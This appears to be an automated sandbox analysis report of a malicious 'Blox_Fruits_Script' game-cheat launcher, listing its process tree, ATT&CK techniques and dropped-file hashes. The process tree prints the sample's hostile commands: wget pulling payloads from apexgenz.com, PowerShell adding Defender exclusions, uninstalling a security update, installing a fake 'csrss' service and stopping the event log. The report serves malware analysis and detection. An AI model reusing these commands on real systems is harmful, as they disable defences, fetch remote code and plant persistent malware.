"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3788

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1708

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2364

C:\Users\Admin\Downloads\Blox_Fruits_Script\Launcher.exe
"C:\Users\Admin\Downloads\Blox_Fruits_Script\Launcher.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4232
- C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
  "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:932
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3260
  - - C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
      "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4508
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2276
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:3772
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:3740
    - - C:\Users\Admin\AppData\Roaming\services\plugin0222
        
        C:\Users\Admin\AppData\Roaming\services\plugin0222
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1304
      - C:\Users\Admin\AppData\Roaming\services\plugin0222
        
        "C:\Users\Admin\AppData\Roaming\services\plugin0222"
        6⤵
        Executes dropped EXE
        
        PID:5100
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 580
        7⤵
        Program crash
        
        PID:5080
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:452
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:1428
    - - C:\Users\Admin\AppData\Roaming\services\2plugin2901
        
        C:\Users\Admin\AppData\Roaming\services\2plugin2901
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4140
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4276
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:3504
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:1032
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "csrss"
        6⤵
        Launches sc.exe
        
        PID:2896
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:2140
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"
        6⤵
        
        PID:192
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:2816
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "csrss"
        6⤵
        Launches sc.exe
        
        PID:3184
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:2824
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        
        PID:3224
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        
        PID:4224
    - - C:\Users\Admin\AppData\Roaming\services\3plugin0222
        
        C:\Users\Admin\AppData\Roaming\services\3plugin0222
        5⤵
        
        PID:4384

C:\Users\Admin\Downloads\Blox_Fruits_Script\Launcher.exe
"C:\Users\Admin\Downloads\Blox_Fruits_Script\Launcher.exe"
1⤵
PID:216

C:\ProgramData\SystemFiles\csrss.exe
C:\ProgramData\SystemFiles\csrss.exe
1⤵
PID:4380
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:5052
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1156
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    PID:3200
- - C:\ProgramData\SystemFiles\csrss.exe
    "C:\ProgramData\SystemFiles\csrss.exe"
    3⤵
    PID:4620
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      PID:2288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:464
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4836
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  PID:840

C:\Users\Admin\Downloads\Blox_Fruits_Script\Launcher.exe
"C:\Users\Admin\Downloads\Blox_Fruits_Script\Launcher.exe"
1⤵
PID:4460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemFiles\csrss.exe

Filesize
2.1MB

MD5
fd197a55e0d47558690f32f8e5fa9ce2

SHA1
cf21caa2063ae79f6a38e0326f84bd14170cf628

SHA256
6f9cb6f8d7dd5e8da2bb11ba4c89b61f42c909efbd28abddbc7f9617f36e843d

SHA512
83f772a1e9e393723de6414e86a746835ba279a46184ef10713a4e8f08b39df45b90df0811c9ca0ec46ff1e2d05c7bcc9f0db7771b6d58fc513922f98391d2cb

Download Submit
C:\ProgramData\SystemFiles\csrss.exe

Filesize
832KB

MD5
1d23025845c529ef6de23b55e81ace84

SHA1
027f0665a23b6b44bf4800a79ed784a10788713b

SHA256
3358cf8b66ffc81f83949e97d2a0f0f1ed1abf2d8b354cc04ec05a109c693dfd

SHA512
36644d97c2d17ec79cfa641dd6a1b6623ac995edf3c5c05a545f4df4a12a853cc072e95eb182906a03dd141bf9f23f94e06dc631a1bd49b03157027e229dd6fd

Download Submit
C:\ProgramData\SystemFiles\csrss.exe

Filesize
1.8MB

MD5
4a3cf50e55979904d1a11ad1b66c8d21

SHA1
c88500d2d704f6dfc4620d2326ac452ce0e28ba6

SHA256
f83189e326c25869f8c2d77ecc3dab045efff97b193bb57d97703880f9e4f9a9

SHA512
a19b965afb27f9b4d165e48f9488c78325cf233304967e80df92eef2f02fc01e9869225ca0cd04b80ab894bbd75c9609286afe0ee5d71c4aad3c8d46829b0ba9

Download Submit
C:\ProgramData\SystemFiles\csrss.exe

Filesize
1.9MB

MD5
8cddb686207bdd08a502f67fb0eb386d

SHA1
e7cceaa8f67fddef2393e0ec1b5ba3537acdc77a

SHA256
e5fd2fd58bdb227e598cdc09507cc893b5c2b340bbcdde644755ab595c186acc

SHA512
44c52c524c4ad109e89a8cb46b0dd99f4bceb1e191e3614f7099d85c728b2a28f478a3f521cf113d0cb739a0c7db6181110eaf1db799dd4d9ccaa7d9d74bd81a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\U2DI4E2V\edgecompatviewlist[1].xml

Filesize
74KB

MD5
d4fc49dc14f63895d997fa4940f24378

SHA1
3efb1437a7c5e46034147cbbc8db017c69d02c31

SHA256
853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

SHA512
cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc

SHA1
75c07243f9cb80a9c7aed2865f9c5192cc920e7e

SHA256
91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

SHA512
db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
cd0f3de422562b5a9d1e107d863906c1

SHA1
e254159e4e6cc39a178385d0c4c52e0d963fd5eb

SHA256
3e36af8753104fa5e2f6cb404f8ca4e10b41849d23f2b6fe64fd429a71ca09b6

SHA512
07e1671215e2e4c213bf97299da6f16ad2dfbd7ed1a95d10bbc3646b4d0a65d89966aa3d5ec236952aa24e495e705f1e9f119a992e1981be06bcd9c3015e73d0

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\2BLIJTFS\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\75XOO2D4\Blox_Fruits_Script[1].zip

Filesize
1.4MB

MD5
1b3b1ca7ae1cd4fe4ee459fb20295910

SHA1
a2d483a5e7eeca0a8b74fde655c4f8eca590bda6

SHA256
10dcabb2c202f7600be796a769c2d3f8877f090a75ef1599292cdfd9111e19e2

SHA512
69a740e06b7c1ccb068529546650e61ca3ae17a276a2e89c79d58f6f5f5125384f0ef093d59f92699c916dd6b796dfa16c71ef76fe3605cb3a8d0697b7e7818e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4l2udv35.iy2.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

Filesize
12B

MD5
9a460e4f43728a35a3a62ad4105e5051

SHA1
b2d9c483f8ed54b619ba4bc8d6c250e092a43fce

SHA256
8bfb6960bd0c725bd52c949e872cb4ab9b49a8f49d02ed91ecc3d9969c38f65c

SHA512
7c4781bfaf11c55c8ac8becdf967a6c0c0d39c1668a4ad9a95445d64594516bb693f8099f4b4281885703d466db2cb9a391b1896eaf2cbac4984c3ef2a2fe9a9

Download Submit
C:\Users\Admin\AppData\Roaming\services\.wget-hsts

Filesize
184B

MD5
f7aa54ad3fe7b86cd066d5d8cf5a4cd0

SHA1
cba3e42615f6c1f87ffac72ad378724cc745e9b2

SHA256
162ad1236597080545dd4514b3ab910e727fab97e066d2c17e973435f98e22cd

SHA512
f7262aaf2e8081ef2946274695b4f7dc433a54227380665f15124a8f72432d141edb68786689fc74146f2c11c2421739c93ae9a7e129f33cffef669d33044511

Download Submit
C:\Users\Admin\AppData\Roaming\services\01plugins0222.rar

Filesize
3.0MB

MD5
192ea396deb46406bed716cde8b0fda6

SHA1
b48459b0e4f8d712150c2db39764d3658678f8ac

SHA256
c56f6db940d4802fce1621bd03c3563869acc5ccf2f8fc7ef6a4cc5d17e0c04d

SHA512
359fb7a51a6524e5fab57de6b799082e3c9d0582cf0a01a5535d11c02c09803a59da47c5a1d65d6306631fa31e4eb8a03479aec5c877d7e4157f3c60ebeda6e1

Download Submit
C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar

Filesize
934KB

MD5
9640a0a43cb576630dcedcdc0d95ca6b

SHA1
7743e4728b0ff37b76c7e55490a5dedb8d87fc66

SHA256
52424ad37f9ee799a3bec65b9be0a53d681dfcbefb2b6c3e3933520ab27bd3c5

SHA512
a3c25c691c5ce3a31fd07a2e23ffe988eb79ead40e7993ca45920e8536f8c9957a3527985bdf624911add78c83df811b226d725f688ea4c347027daf71f40f0d

Download Submit
C:\Users\Admin\AppData\Roaming\services\03plugins0222.rar

Filesize
187KB

MD5
f6b855f01fb447740f349efe8fbff7d9

SHA1
77c5b2de71d11dc50a6e3552d497391c2e3a7fd0

SHA256
d84fc80b7205c873d9e7a992431637ca533ba87263f2c1ec0a1c30def14b3f09

SHA512
00fa2bcf908aa09ab013bb6cd265956782de1a18b6f53acdf4e79a45b794a0bd25ab47b29f60b07c99d2fb0dd4dcc18695b5edb801b9853f4375460e857283ef

Download Submit
C:\Users\Admin\AppData\Roaming\services\2plugin2901

Filesize
1.1MB

MD5
f1e67f2c478b2273e121173f9e1d3e94

SHA1
cf3e133e029bcfc29e513723ab6dde35991fdf9b

SHA256
a5a292055771c3afe07a7fc03b3db5ff699c1db8c1e99c34d7e3c6f2143729cc

SHA512
890d7ecc98ec0eceea140d99e06243fcf52cf75ec161fe122320358d55a50b5e60b80f387d7a24aab7973cdadc982a8d9a1157e35f6bf3a8118ddcbccd27fdb8

Download Submit
C:\Users\Admin\AppData\Roaming\services\2plugin2901

Filesize
448KB

MD5
f3869a800e9fd30bfc81696fcdd9df5c

SHA1
e485ade5f92bef5fa4e456eacccf0f87fabc94d7

SHA256
56d22c6f5a8387d11e84b757179496767f7b9fd45f7fc132cb6b2894590c5507

SHA512
976d54cb971d2c3d126880715c9499a0b241b3276b746b4da1318b1fbf0b08aac8a0832d21b4e570dc971d489ef48b9164dd31c94867d17a57dcf36d5aa6678e

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

Filesize
2KB

MD5
7de0541eb96ba31067b4c58d9399693b

SHA1
a105216391bd53fa0c8f6aa23953030d0c0f9244

SHA256
934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e

SHA512
e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

Filesize
364KB

MD5
e5c00b0bc45281666afd14eef04252b2

SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758

SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

Filesize
1KB

MD5
f0fc065f7fd974b42093594a58a4baef

SHA1
dbf28dd15d4aa338014c9e508a880e893c548d00

SHA256
d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

SHA512
8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

Download Submit
C:\Users\Admin\AppData\Roaming\services\WinRAR.exe

Filesize
939KB

MD5
3b264e3db8edd76cd9e55cdf93a8dd54

SHA1
a31ecae91a21d756a120931b7ffe91fa545eea2f

SHA256
1e8d4613374be095aaed36094ab7c976988d2128dbea0525f93ae22e27387c16

SHA512
db13cf9974a18a5a351f58d78c34dd8c5852dd4c164fe7ac8e5ecb43e23b1ede6e04af29f9e59de2c668f1cb5b212468a5ec77bb2ea3406e70d247df50b5e0bb

Download Submit
C:\Users\Admin\AppData\Roaming\services\WinRAR.exe

Filesize
376KB

MD5
3a643e863533466a481ac02151d4e203

SHA1
e2e39fb0651c64a6e4db791eccafa1792142b643

SHA256
ff9fcb02bf098872ef867c898202adfce39f74811bb2ebeed8f6aa75926a0d8f

SHA512
ad8c588cb161b28fcfb38869ee1b0ee660149338b570b37f6fc993286b5ea3c6d62fc92819b919035d6f96e9408a8044e07ef6dd432a9ddafdd2cbb448dc10be

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

Filesize
6KB

MD5
f58866e5a48d89c883f3932c279004db

SHA1
e72182e9ee4738577b01359f5acbfbbe8daa2b7f

SHA256
d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12

SHA512
7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

Filesize
364KB

MD5
fea10d11d84919cb9a0a0752d61c0a66

SHA1
aea3c65e2b62851b2dd112597f28379b49c58a0a

SHA256
2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7

SHA512
e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

Filesize
1KB

MD5
1b6de83d3f1ccabf195a98a2972c366a

SHA1
09f03658306c4078b75fa648d763df9cddd62f23

SHA256
e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

SHA512
e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

Download Submit
C:\Users\Admin\AppData\Roaming\services\plugin0222

Filesize
1.6MB

MD5
2af9ff856d74d7277caf549dcdf9fe0c

SHA1
b468eeecef369ae18ced438e32e5e4356a2c6863

SHA256
b48fad4bf15800445f2f9eb2bfca913ad657a9c71935cad2b274f3bb537bc456

SHA512
58c65f98fe5c41dfe0ec8c95b9ddba000f5ecefb5f66b503b32da99d848f3a5426e05940daabb661ffd20f61ee75f6f727a7af5ee791766c747da56f480a76e7

Download Submit
C:\Users\Admin\AppData\Roaming\services\plugin0222

Filesize
1.1MB

MD5
22099f4da8e569a1c496256f57113c5e

SHA1
96dc8168c3cc9e2890e7d627430646747403107e

SHA256
732b10562cfc577f805fbb4a18d025572ca3bcee3081282be787e8c21426d5c3

SHA512
57d608f941882dec1162034630064a5d3a8e35f6ab832519d7a9da2947267f840a8d5dfb6ffde0a3aa63d5c088c5b27d55adaecca51b606276ae834044f26b0e

Download Submit
C:\Users\Admin\AppData\Roaming\services\plugin0222

Filesize
1.9MB

MD5
64f319b16535be504b229a39e82d1f6f

SHA1
016f7cf32cdbf275813239ff06326b950397502e

SHA256
94b356f51f0ef02bc78a88c43753531246116052aac1140eb10a700634835355

SHA512
d5efa4942c1d4dab5e7fc687718d7487828da43241914118f6d6284b9c63941364364d3f6d2b6ee00a70dda9557a05e6b96861c4243e5df4b26db784853eb5e2

Download Submit
C:\Users\Admin\AppData\Roaming\services\wget.exe

Filesize
3.8MB

MD5
a179b0a897993ba27f31718dd67bfe63

SHA1
ba76261ef6b5d7aae21d6b141f8161fd605b8034

SHA256
22407a9487482d8c1ed34b64a02643b43dc650da8e4fae5c30542625f55938c1

SHA512
ed973736da5235b90d2d4087aff74de4653c5923d0ad63b2b381d1a0cc0c2c95e48a55fa26254189f14edb344deb40e46b17e9524dee6ec9f34140b7b7998401

Download Submit
C:\Users\Admin\AppData\Roaming\services\wget.exe

Filesize
4.6MB

MD5
d3be4b499ec9d9348f756027aa1e1072

SHA1
a47fa93d04fa841e540f167a1bf6787e2b04d4a8

SHA256
dccce20ea207d25e24edacc4c8cebf0fb47f91f0a77f6533d6aae551be679141

SHA512
650ea9fb601f8387d7f097191e74d2d7e93129f0fa4e028ffb38d19213c868f34dd8df4206422852c92747b625ea72c0301ac1622979b66e5547893aaf584bd3

Download Submit
C:\Users\Admin\AppData\Roaming\services\wget.exe

Filesize
924KB

MD5
9b38b6acc2253585c5d174dae8040369

SHA1
e4ca9befec267a6c3a4faf062002f7e3617a3d0c

SHA256
535d2c1a1141aef294c4de7c1af4ce526d42e2d713f808dfcab06e157659aad8

SHA512
20c6ba38bf37a62d6a03e8fa82fd4d185d1024bd363bd35b038dbf79d79058d3aaebec7b746c99dc413124fc854fa80866910bb404b1f3121ec10e748a87c372

Download Submit
C:\Users\Admin\AppData\Roaming\services\wget.exe

Filesize
54KB

MD5
dba0639c8265ab9ee8ab2f3ebd2cdbc5

SHA1
dcb65c2ea7ce20a0b10021c8ef0fcac749cb3694

SHA256
77c26a2a41064c0c62d1cc81251786eb006babd3a07de5d1e8e5308bf7bb179d

SHA512
ee9bfb99e96af246a8b900dc71477d34ed0652b82a1c96a4faa4cc08785c8e88f775927ebeae9c69834061f4f62600f1fe1ac13f30eb88cd35f6d8b701cb2adf

Download Submit
C:\Users\Admin\AppData\Roaming\services\winrar.exe

Filesize
2.1MB

MD5
f59f4f7bea12dd7c8d44f0a717c21c8e

SHA1
17629ccb3bd555b72a4432876145707613100b3e

SHA256
f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

SHA512
44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

Download Submit
C:\Users\Admin\Downloads\Blox_Fruits_Script.zip

Filesize
1.8MB

MD5
6ba192713ced243903fe998ea2b7e7eb

SHA1
76c0ea4bb4af1815e892e703d109554b9c9f9bf2

SHA256
7836fc9cf1e9d715e02454124a3246589b18614f4146c6e3d9e604689adebc44

SHA512
fcb42219703fb60b54fade9473c22c442f56bd79132dcb28adeef950f1b4aec23b99616655e71ed00f9bc977a7934696e8481901893753929a838d284741d0da

Download Submit
C:\Users\Admin\Downloads\Blox_Fruits_Script.zip

Filesize
254KB

MD5
fc459f9d247353360fd7febb669625e6

SHA1
c30ffb8e1291e5343fe31f8a5f944b5eaf978f33

SHA256
7f59e9dae23694f704a3505c0f8baf9d96d9d0e55a4145cb6e91c92a8f871d75

SHA512
29a4825f64defcb3b831a94350f3e6000752b7fecb3f35de4721283c5f439f495770c8e10a567c8735b1ae036da6da1acc0b4c8d57417c47e332325b833e3274

Download Submit
C:\Users\Admin\Downloads\Blox_Fruits_Script.zip.1ydof4g.partial

Filesize
7.9MB

MD5
e259c164f53f0e9b81163e766fa0984b

SHA1
87a96782a6a0bfc433435a885a8d2dad5b7f5f6b

SHA256
476268a5bbc5ac77edd2b33b6a1174c9079c2418a2aee58dc851e20c4335aadb

SHA512
2447fb3d7475a9e40eaa677f64c950e817ee8228248b154956cda3496742df8a4646cde9e6ec7b07cf28afc6616712473703a5452a434d8ec0f1b02dee721ca3

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
811d351aabd7b708fef7683cf5e29e15

SHA1
06fd89e5a575f45d411cf4b3a2d277e642e73dbb

SHA256
0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

SHA512
702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
05d486f2e8afaea322c565a15c0e9449

SHA1
77406cdb9cf1ef3951ba2a82d8ba62d916359205

SHA256
e4127302a39bb5ad4ad0a9d17c9f2c0ebae888f36d183ff65bedee27c4959e16

SHA512
466041d2cb422a82914abf993a96ada2a7b04257bfdae8a765792d68696ef0023bf662aa2bbd66505d912cfce96112258d291e1b91f73be0b6edf1570a1bf982

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
302a7c179ef577c237c5418fb770fd27

SHA1
343ef00d1357a8d2ff6e1143541a8a29435ed30c

SHA256
9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

SHA512
f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
7575c74a6cb2582fe872ec4e5c34d9ae

SHA1
8616d5c5687df7133cb3320d131ab82a25197ca7

SHA256
5cfc757280526df2130740c4fc1722623bb6a51866af1b4f4fba8acaf2b23064

SHA512
8afc0d7c08397a0efc03b313fd9a4986f29c3415ccd640e582fa60a0d3696539243e8d3859cd1b06aea632646b5eb31ffff5cc73ca3df1ac178f44397607b860

Download Submit
memory/840-1005-0x000001CB0B570000-0x000001CB0B5B0000-memory.dmp

Filesize
256KB

Download
memory/840-888-0x00007FFBB84B0000-0x00007FFBB868B000-memory.dmp

Filesize
1.9MB

Download
memory/1304-483-0x0000000000510000-0x0000000000598000-memory.dmp

Filesize
544KB

Download
memory/1304-484-0x0000000072A10000-0x00000000730FE000-memory.dmp

Filesize
6.9MB

Download
memory/1304-485-0x0000000004E20000-0x0000000004E30000-memory.dmp

Filesize
64KB

Download
memory/1304-490-0x0000000072A10000-0x00000000730FE000-memory.dmp

Filesize
6.9MB

Download
memory/2276-247-0x0000000009E30000-0x0000000009ED5000-memory.dmp

Filesize
660KB

Download
memory/2276-240-0x0000000009C50000-0x0000000009C83000-memory.dmp

Filesize
204KB

Download
memory/2276-220-0x0000000072A10000-0x00000000730FE000-memory.dmp

Filesize
6.9MB

Download
